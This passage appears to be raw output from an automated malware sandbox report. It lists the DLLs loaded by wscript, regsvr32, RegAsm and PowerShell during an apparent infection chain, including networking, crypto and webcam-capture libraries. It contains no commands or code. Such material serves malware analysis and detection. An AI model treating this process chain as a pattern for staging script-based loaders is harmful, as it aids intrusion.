        Source: C:\Windows\System32\wscript.exe  Section loaded: rsaenh.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: msisip.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: wshext.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: scrobj.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: scrrun.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: windows.storage.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: propsys.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: edputil.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: urlmon.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: iertutil.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: srvcli.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: netutils.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: sspicli.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: wintypes.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: appresolver.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: slc.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: sppc.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\wscript.exe  Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: version.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: sxs.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: vbscript.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: amsi.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: wldp.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: msisip.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: wshext.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: scrobj.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: mpr.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: scrrun.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: msxml3.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: msdart.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: propsys.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: edputil.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: netutils.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: wintypes.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: appresolver.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: bcp47langs.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: slc.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: sppc.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: apphelp.dll
        Source: C:\Windows\SysWOW64\regsvr32.exe  Section loaded: apphelp.dll
        Source: C:\Windows\SysWOW64\regsvr32.exe  Section loaded: aclayers.dll
        Source: C:\Windows\SysWOW64\regsvr32.exe  Section loaded: mpr.dll
        Source: C:\Windows\SysWOW64\regsvr32.exe  Section loaded: sfc.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptnet.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: devenum.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: devobj.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msdmo.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: avicap32.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvfw32.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: zipfldr.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.fileexplorer.common.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msxml3.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
